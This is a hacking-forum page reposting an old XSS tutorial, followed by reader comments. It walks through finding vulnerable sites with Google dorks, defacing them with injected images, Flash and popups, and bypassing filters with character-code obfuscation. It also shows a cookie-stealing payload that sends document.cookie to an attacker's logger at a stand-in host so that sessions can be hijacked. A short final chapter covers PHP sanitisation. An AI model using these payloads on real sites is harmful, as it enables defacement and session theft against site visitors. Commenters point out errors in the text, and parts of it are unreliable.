Follow us on Twitter!
It is never to LATE to become what you never WERE.
Saturday, April 19, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 29
Guests Online: 28
Members Online: 1

Registered Members: 82841
Newest Member: and3rv1sh
Latest Articles

XSS The Complete Walkthrough

Arrow Image XSS The Complete Walkthrough



--==+================================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 1 - What is XSS?] +==--
--==+================================================================================+==--

\'XSS\' also known as \'CSS\' (Cross Site Scripting, Easily confused with \'Cascading Style Sheets\')
is a very common vulnerbility found in Web Applications, \'XSS\' allows the attacker to INSERT
malicous code, There are many types of XSS attacks, I will mention 3 of the most used.

The First Attack i wana talk about is \'URL XSS\' this means that the XSS wont stay on the page
it will only get executed if you have the malicous code in the URL and submit the url
we will talk more on how to use this in our advantage.

The Second Attack is input fields, Where ever you can insert data, it is very common, to be XSS
vulnerable, for example say we found a site with a search engine, Now in the search box you enter
\'hacker\' now hit enter, when the page loads, if it says your data like \'Found 100 Results For hacker\'
ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible
way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method,
Also wont stay on the server, this is for your eyes only.

The Third Attack, with this attack you will be able to INSERT data (code) and it will stay on the website.
now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also
inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles
Forums, just most places where you insert data and it stays there. now HTML is totally diffrent then PHP
HTML downloads to your pc and then your \'Browser\' parses/interprets the code, (thats why its source is viewable)
With PHP the code is interpretued on the server the script is hosted on, then the data is returned to the browser.
for PHP injection its rare, But it dont harm to try. Note: PHP code cant be injected into HTML page!


--==+================================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 2 - Finding XSS Vulnerbilitys] +==--
--==+================================================================================+==--

Well to start finding these vulnerbilitys you can start checking out
Blogs, Forums, Shoutboxes, Comment Boxes, Search Box\'s, there are too many to mention.

Using \'Google Dorks\' to make the finding easyier, Ok if you wana get cracking, goto google.com and type
inurl:\"search.php?q=\" now that is a common page and has alot of results, to find out some attacks move
onto the next chapter.

Also note that most sites have XSS vulnerbilitys, its just having a good eye, and some good knowledge
on how to bypass there filteration.


--==+================================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 3 - The Basics On XSS] +==--
--==+================================================================================+==--

Well now to crack on, and start learning some Actual Methods, the most common used XSS injection is

<script>alert(\"XSS\")</script>

now this will alert a popup message, saying \"XSS\" without quotes, its easily editable.

So backtracking on the last chapter im assuming you remember we talked about, search.php?q=
well you can simple try the following on a website with the same thing,

http://site.com/search.php?q=<script>alert(\"XSS\")</script>

there are good chances of it working, but dont be worried if it dont, just try diffrent sites.

some other easy XSS (i dont think people realise they can insert HTML not just javascript)

http://site.com/search.php?q=<br><br><b><u>XSS</u></b>

if you see the bold text on the page and newlines then you knows its vuln, then can move on using some
methods explained later on in the tutorial.


--==+================================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 4 - Deface Methods] +==--
--==+================================================================================+==--

Well now you understand how XSS works, we can explain some simple XSS deface methods, there
are many ways for defacing i will mention some of the best and most used,

the first one being IMG SCR, now for those of you who dont know html, IMG SCR is a tag, that
displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC=\"http://site.com/yourDefaceIMAGE.png\"></body></html>

ok now if u change the link to a valid picture link, and save it and run it you will see what i mean.

Right now say you have found a Shoutbox, Comment box, or anything that shows your data after you submitted it
you could insert the following to make the picture display on the page.

<IMG SRC=\"http://site.com/yourDefaceIMAGE.png\">

the other tags are not needed has the page will already have them. (rare cases they will not)

Ok it helps to make your picture big so it stands out and its clear the site got hacked.

Another method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC=\"http://site.com/xss.swf\"

that will execute the flash video linked to it.

Or maybe using a pop or redirection?

<script>window.open( \"http://www.google.com/\" )</script>

There are many others ways that im not going to explain due to how busy i am, Its easy to lookup methods
using google and googleing for HTML tutorials, u can see how to embed Music ect.


--==+================================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 5 - Cookie Stealing] +==--
--==+================================================================================+==--

I decided to add this has its the most USEFULL method of XSS, and i havent seen any papers, covering it.

first grab the cookie logger from here: http://G0t-Root.net/tools/cookie.php

ok now you have it save it has a .php file and upload to your server, remember to create the file \'log.txt\' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.

ok now your gona want to insert this code.

window.location = \"http://yourServer.com/cookielogger.php?c=\"+document.cookie

or

document.location = \"http://yourServer.com/cookielogger.php?c=\"+document.cookie


now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth.

Watch your file now for cookies, then you can hijack there session :D

but now you ask what if my site hasnt got, this kind of attack, it only shows data once and dont
store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it
and maybe hex, base64 encode it so people cant see the code

http://site.com/search.php?q=document.location = \"http://yourServer.com/cookielogger.php?c=\"+document.cookie

im not gona explain hexing it ect as it is pretty stright forward.


--==+================================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 6 - Filteration Bypassing] +==--
--==+================================================================================+==--

Alot of sites may seem vulnerable but not executing the code, well to solve this take note of this chapter.

Some common methods to bypass filteration is

\')alert(\'xss\');

or

\");alert(\'xss\');

that will do the same thing has <script>alert(\"XSS\")</script> on a vulnerable server.

You can also try hexing or base64 encoding your data before you submit,

Please note its bad practice to use alert(\"XSS\") to test for XSS, has ive known sites block the keyword XSS
before.

Some other ways to bypass filteration

<script type=text/javascript>alert(\"t0pP8uZz\")</script>
<script>alert(\"t0pP8uZz\")</script>;
<script>alert(\"t0pP8uZz\");</script>
<script>alert(\"/t0pP8uZz\"/)</script>
<script>var var = 1; alert(var)</script>

Read the next chapter for another way to bypass magic quotes filteration.


--==+================================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 6 - Advanced XSS] +==--
--==+================================================================================+==--

Ok in this chapter were going to learn about some good techniqes, that i myself havent seen
being used before, but im sure you guys will like it.

ive came across many sites where \'Magic Quotes\' is on and therfore rendering some commands useless.

fear not, ive come up with a way using char codes (Decimals), to convert char code to Ascii.

The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here http://www.asciitable.com/

this will help you write what you want, In my examples ill be writing \"t0pP8uZz\" this is the following code

116 48 112 80 56 117 90 122

Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.

String.fromCharCode()

is suitable for this kinda things, its easy to setup, im gona give it my args below.

String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)

Ok now \"String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)\" Is a JAVA (ASCII) way of saying

t0pP8uZz

and to use this with alerts ect, you dont need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122))</script>

Ok now this will display or message in this case \"t0pP8uZz\", this method is very usefull for
bypassing magic quotes and maybe some custom escaping of quotes.

Ok before i move on i wana talk about another method useing variables. lets declare one below

var myVar = 1

ok now myVar is a longer way of saying 1.

To use variables to our advantage in XSS, we could do the following

<script>var myVar = 1; alert(myVar)</script>

and this will display the variable contents again without using quotes.

There are many others methods, that im not going to talk about, XSS is a simple Attack.
and from here you should know what you need.


--==+================================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 7 - Securing XSS] +==--
--==+================================================================================+==--

Ok this was written for WebDevelopers (yeah right..) so im gona talk about how to secure your code.

if you found XSS bugs in your scripts, its easy to secure, take a look at the below code

if(isset($_POST[\'form\'])){echo \"<html><body>\" .$_POST[\'form\']. \"</body></html>\";}

Ok say the variable $_POST[\'from\'] was coming from a input box, then you have a XSS attack.
the following is a very easy way to secure that.

$charset=\'UTF-8\'; $data = htmlentities ($_POST[\'form\'], ENT_NOQUOTES, $charset);
if(isset($data)){echo \"<html><body>\" .$data. \"</body></html>\";}

now that will take all possible code and make it not executable. by turning it into stuff like
< ect...

You will not notice a diffrence when using htmlentries();

there are also another common function, striptags(), find more info at php.net/striptags

ok another way to show you how to secure INTEGER variables. (variables that will always contain a INT)

$this = $_GET[\'id\'];
echo \"you are viewing \" . $this . \"blog\";

now if we include ?id=<script>alert(\"XSS\")</script>
into the url its gona execute our code, a very easy way to secure this is using (int) check the following code

$this = (int)$_GET[\'id\'];
echo \"you are viewing \" . $this . \"blog\";

now if at anytime the varible contains anything but a Integer, it will return 0.

Thats enough said.


--==+================================================================================+==--
--==+ XSS The Complete Walkthrough [The End] +==--
--==+================================================================================+==--

ps. this is not my article. just to help you out out some basic xss

article from milworm.com
main auther: t0pP8uZz

Comments

nights_shadowon September 21 2007 - 10:22:06
It's a pretty good walkthrough, most definately not complete. Off the top of my head, how about inline javascript injections and pure hexadecimal encoding? Although, now that i see the part i missed at the way bottom, who actually wrote the article?
korgon September 21 2007 - 11:17:35
I remember this on: http://www.milw0r. . .papers/173. Lot's of good stuff there.
korgon September 21 2007 - 11:18:52
^^^^ I Ment on milw0rm ^^^^. Not this article BTW.
asilvermtzionon September 21 2007 - 17:24:42
its good for total beginners, shud probably give creds tho
spywareon September 21 2007 - 18:31:02
Meh, join sla.ckers.org or something. You covered the easy basics.
only_samuraion September 22 2007 - 02:44:55
no offense, but i think this is a crap article. i wouldnt have let it through. too many things missing or skimmed past.
magnetosphereon September 22 2007 - 04:18:15
Not trying to be rude or anything, but why re invent the wheel? There are a lot of holes in this article. And I agree with every one else, you are just covering the basics...
shadowlson September 22 2007 - 06:48:48
As i said in the bottom, i did not write this article. This article helped me a lot to learn the basic of xss and stuff. i also put the main auther at the end of the page.
beepon September 22 2007 - 17:50:24
-
richohealeyon September 26 2007 - 04:45:38
Meh, there are things that are incomplete, and things that are flat out wrong. Did you get teh author's permission? God help you if i find my articles about without permission / credit.
Skunkfooton September 30 2007 - 03:27:06
'XSS' also known as 'CSS' Q? Since when and in what country? XSS is completely different than CSS, not a.k.a. (constructive criticism Pfft)
shadowlson October 02 2007 - 06:29:12
This is the best article by far Smile
Zephyr_Pureon October 03 2007 - 20:02:17
You're an idiot... you gave your own rip praise? The article was decent for basics, but I hate the whole "Google Dork then deface" mentality. Guess none of that matters, though, since you didn't actually WRITE the article. Good job... probably rated yourself awesome, too, didn't you? What a douche. :angry:
ThorsDecreeon October 25 2007 - 19:44:39
I agree with about everyoen else above me... it's not that great, you missed a few things, got a few items mixed up, and, of course, just took an article from someone else and posted it here. Write your own stuff! Poor (tho not as poor as the '10 reasons to get Vista' article!)
Hatred1911on December 21 2007 - 16:07:10
can anybody tell me why the cookie link in chapter 5 isn't working (404)? BTW i do respect the person who wrote this article and the person who brought it here,it's no good to criticize anybody for doing anything useful...
loxaXcrackeron January 04 2008 - 12:41:52
Very good article i finally learn about xss
Uber0non February 12 2008 - 19:50:05
Damn, was this even written by someone who knows HTML? Both the 'URL XSS' as well as the 'input field XSS' are actually called Non-Persistent XSS, with the difference that the url ones use GET and the others use POST (note however that a GET XSS in an iframe wouldn't show up in the URL you see in the browser...) Also stuff like 'i dont think people realise they can insert HTML not just javascript' makes this article look extremely stupid ^^
PoorHackeron February 24 2008 - 08:36:51
ITS GOODPfft
shadowlson April 01 2008 - 02:22:43
<script>alertSadtest)</script>
hawksteron October 15 2008 - 02:05:52
^ XSS fail The colon : function method only works in the Address Bar, and even then it's the format "javascript:alert('test'Wink"
t0xikc0mputeron January 17 2011 - 23:01:08
Can someone please write an un-plagiarised article that is actually helpful, maybe with pictures, etc. I am a total beginner, but I know that it would be wise for you to take this article off the site and stop getting criticised. It would be best for all of us not having to read your crap article that isn't even yours. Whatev.
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.